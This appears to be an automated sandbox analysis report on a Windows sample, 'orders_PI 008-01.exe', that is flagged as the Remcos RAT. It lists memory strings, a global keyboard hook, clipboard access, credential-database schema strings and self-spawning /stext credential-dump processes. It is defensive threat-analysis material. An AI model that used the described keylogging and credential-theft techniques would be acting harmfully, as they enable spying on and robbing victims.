              Source: bhv2901.tmp.5.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5a&
              Source: bhv2901.tmp.5.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=MIRA-WW-PH7&FrontEn
              Source: bhv2901.tmp.5.drString found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
              Source: bhv2901.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: bhv2901.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: bhv2901.tmp.5.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: orders_PI 008-01.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: bhv2901.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
              Source: bhv2901.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
              Source: bhv2901.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
              Source: bhv2901.tmp.5.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
              Source: bhv2901.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
              Source: bhv2901.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-08-30-16/PreSignInSettingsConfig.json
              Source: bhv2901.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=13164f2a9ee6956f1439
              Source: bhv2901.tmp.5.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=b92552
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
              Source: bhv2901.tmp.5.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
              Source: bhv2901.tmp.5.drString found in binary or memory: https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?407dab52f7bc43350b5cde12afe93269
              Source: bhv2901.tmp.5.drString found in binary or memory: https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?469316a07faf13c962eeef1395652e59
              Source: bhv2901.tmp.5.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: orders_PI 008-01.exe, orders_PI 008-01.exe, 00000007.00000002.1761634918.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: orders_PI 008-01.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: bhv2901.tmp.5.drString found in binary or memory: https://www.office.com/

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Installs a global keyboard hook
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\orders_PI 008-01.exeJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_0041183A OpenClipboard,GetLastError,DeleteFileW,5_2_0041183A
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_0040987A
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,5_2_004098E2
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,6_2_00406DFC
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,6_2_00406E9F
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 7_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,7_2_004068B5
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 7_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,7_2_004072B5

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3887015432.000000000358D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3879351770.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: orders_PI 008-01.exe PID: 8112, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              System Summary

              barindex
              Initial sample is a PE file and has a suspicious name
              Source: initial sampleStatic PE information: Filename: orders_PI 008-01.exe
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,5_2_0040DD85
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_00401806 NtdllDefWindowProc_W,5_2_00401806
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_004018C0 NtdllDefWindowProc_W,5_2_004018C0
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_004016FD NtdllDefWindowProc_A,6_2_004016FD
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_004017B7 NtdllDefWindowProc_A,6_2_004017B7
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 7_2_00402CAC NtdllDefWindowProc_A,7_2_00402CAC
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 7_2_00402D66 NtdllDefWindowProc_A,7_2_00402D66
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 0_2_004034A2 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,LdrInitializeThunk,CharNextW,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,LdrInitializeThunk,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,LdrInitializeThunk,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,ExitWindowsEx,LdrInitializeThunk,ExitProcess,0_2_004034A2
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeFile created: C:\Windows\resources\0809Jump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 0_2_6FF41B5F0_2_6FF41B5F
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 3_2_344BB5C13_2_344BB5C1
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 3_2_344C71943_2_344C7194
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_0044B0405_2_0044B040
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_0043610D5_2_0043610D
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_004473105_2_00447310
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_0044A4905_2_0044A490
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_0040755A5_2_0040755A
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_0043C5605_2_0043C560
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_0044B6105_2_0044B610
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_0044D6C05_2_0044D6C0
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_004476F05_2_004476F0
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_0044B8705_2_0044B870
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_0044081D5_2_0044081D
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_004149575_2_00414957
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_004079EE5_2_004079EE
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_00407AEB5_2_00407AEB
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_0044AA805_2_0044AA80
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_00412AA95_2_00412AA9
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_00404B745_2_00404B74
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_00404B035_2_00404B03
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_0044BBD85_2_0044BBD8
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_00404BE55_2_00404BE5
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_00404C765_2_00404C76
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_00415CFE5_2_00415CFE
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_00416D725_2_00416D72
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_00446D305_2_00446D30
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_00446D8B5_2_00446D8B
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_00406E8F5_2_00406E8F
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_004050386_2_00405038
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_0041208C6_2_0041208C
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_004050A96_2_004050A9
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_0040511A6_2_0040511A
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_0043C13A6_2_0043C13A
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_004051AB6_2_004051AB
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_004493006_2_00449300
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_0040D3226_2_0040D322
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_0044A4F06_2_0044A4F0
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_0043A5AB6_2_0043A5AB
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_004136316_2_00413631
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_004466906_2_00446690
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_0044A7306_2_0044A730
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_004398D86_2_004398D8
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_004498E06_2_004498E0
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_0044A8866_2_0044A886
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_0043DA096_2_0043DA09
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_00438D5E6_2_00438D5E
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_00449ED06_2_00449ED0
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_0041FE836_2_0041FE83
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 6_2_00430F546_2_00430F54
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 7_2_004050C27_2_004050C2
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 7_2_004014AB7_2_004014AB
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 7_2_004051337_2_00405133
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 7_2_004051A47_2_004051A4
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 7_2_004012467_2_00401246
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 7_2_0040CA467_2_0040CA46
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 7_2_004052357_2_00405235
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 7_2_004032C87_2_004032C8
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 7_2_004222D97_2_004222D9
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 7_2_004016897_2_00401689
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 7_2_00402F607_2_00402F60
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: String function: 00416760 appears 69 times
              Source: orders_PI 008-01.exeStatic PE information: invalid certificate
              Source: orders_PI 008-01.exe, 00000003.00000003.1775848112.00000000035B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs orders_PI 008-01.exe
              Source: orders_PI 008-01.exe, 00000003.00000003.1775575621.00000000035B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs orders_PI 008-01.exe
              Source: orders_PI 008-01.exe, 00000003.00000002.3908240272.000000003449B000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs orders_PI 008-01.exe
              Source: orders_PI 008-01.exe, 00000003.00000003.1756993058.0000000034101000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs orders_PI 008-01.exe
              Source: orders_PI 008-01.exe, 00000003.00000003.1757596772.00000000035A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs orders_PI 008-01.exe
              Source: orders_PI 008-01.exeBinary or memory string: OriginalFileName vs orders_PI 008-01.exe
              Source: orders_PI 008-01.exeBinary or memory string: OriginalFilename vs orders_PI 008-01.exe
              Source: orders_PI 008-01.exe, 00000007.00000002.1761634918.000000000041B000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs orders_PI 008-01.exe
              Source: orders_PI 008-01.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@9/15@1/3
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,5_2_004182CE
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 0_2_004034A2 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,LdrInitializeThunk,CharNextW,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,LdrInitializeThunk,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,LdrInitializeThunk,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,ExitWindowsEx,LdrInitializeThunk,ExitProcess,0_2_004034A2
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 7_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,7_2_00410DE1
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,5_2_00418758
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,5_2_00413D4C
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeCode function: 5_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,5_2_0040B58D
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeFile created: C:\Program Files (x86)\Common Files\kvindagtigt.iniJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeFile created: C:\Users\user\kretekniske.iniJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-BHLA3T
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeFile created: C:\Users\user\AppData\Local\Temp\nsx9F9D.tmpJump to behavior
              Source: orders_PI 008-01.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: orders_PI 008-01.exe, orders_PI 008-01.exe, 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: orders_PI 008-01.exe, orders_PI 008-01.exe, 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: orders_PI 008-01.exe, 00000003.00000002.3907921678.0000000033F20000.00000040.10000000.00040000.00000000.sdmp, orders_PI 008-01.exe, 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: orders_PI 008-01.exe, orders_PI 008-01.exe, 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: orders_PI 008-01.exe, orders_PI 008-01.exe, 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: orders_PI 008-01.exe, orders_PI 008-01.exe, 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: orders_PI 008-01.exe, 00000005.00000002.1773908926.00000000027BD000.00000004.00000020.00020000.00000000.sdmp, orders_PI 008-01.exe, 00000005.00000003.1768964426.00000000027BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: orders_PI 008-01.exe, orders_PI 008-01.exe, 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: orders_PI 008-01.exeReversingLabs: Detection: 13%
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeFile read: C:\Users\user\Desktop\orders_PI 008-01.exeJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_6-33208
              Source: unknownProcess created: C:\Users\user\Desktop\orders_PI 008-01.exe "C:\Users\user\Desktop\orders_PI 008-01.exe"
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeProcess created: C:\Users\user\Desktop\orders_PI 008-01.exe "C:\Users\user\Desktop\orders_PI 008-01.exe"
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeProcess created: C:\Users\user\Desktop\orders_PI 008-01.exe "C:\Users\user\Desktop\orders_PI 008-01.exe" /stext "C:\Users\user\AppData\Local\Temp\zwewot"
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeProcess created: C:\Users\user\Desktop\orders_PI 008-01.exe "C:\Users\user\Desktop\orders_PI 008-01.exe" /stext "C:\Users\user\AppData\Local\Temp\jqrhomwbo"
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeProcess created: C:\Users\user\Desktop\orders_PI 008-01.exe "C:\Users\user\Desktop\orders_PI 008-01.exe" /stext "C:\Users\user\AppData\Local\Temp\msxapegdbomic"
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeProcess created: C:\Users\user\Desktop\orders_PI 008-01.exe "C:\Users\user\Desktop\orders_PI 008-01.exe"Jump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeProcess created: C:\Users\user\Desktop\orders_PI 008-01.exe "C:\Users\user\Desktop\orders_PI 008-01.exe" /stext "C:\Users\user\AppData\Local\Temp\zwewot"Jump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeProcess created: C:\Users\user\Desktop\orders_PI 008-01.exe "C:\Users\user\Desktop\orders_PI 008-01.exe" /stext "C:\Users\user\AppData\Local\Temp\jqrhomwbo"Jump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeProcess created: C:\Users\user\Desktop\orders_PI 008-01.exe "C:\Users\user\Desktop\orders_PI 008-01.exe" /stext "C:\Users\user\AppData\Local\Temp\msxapegdbomic"Jump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeSection loaded: windows.storage.dllJump to behavior
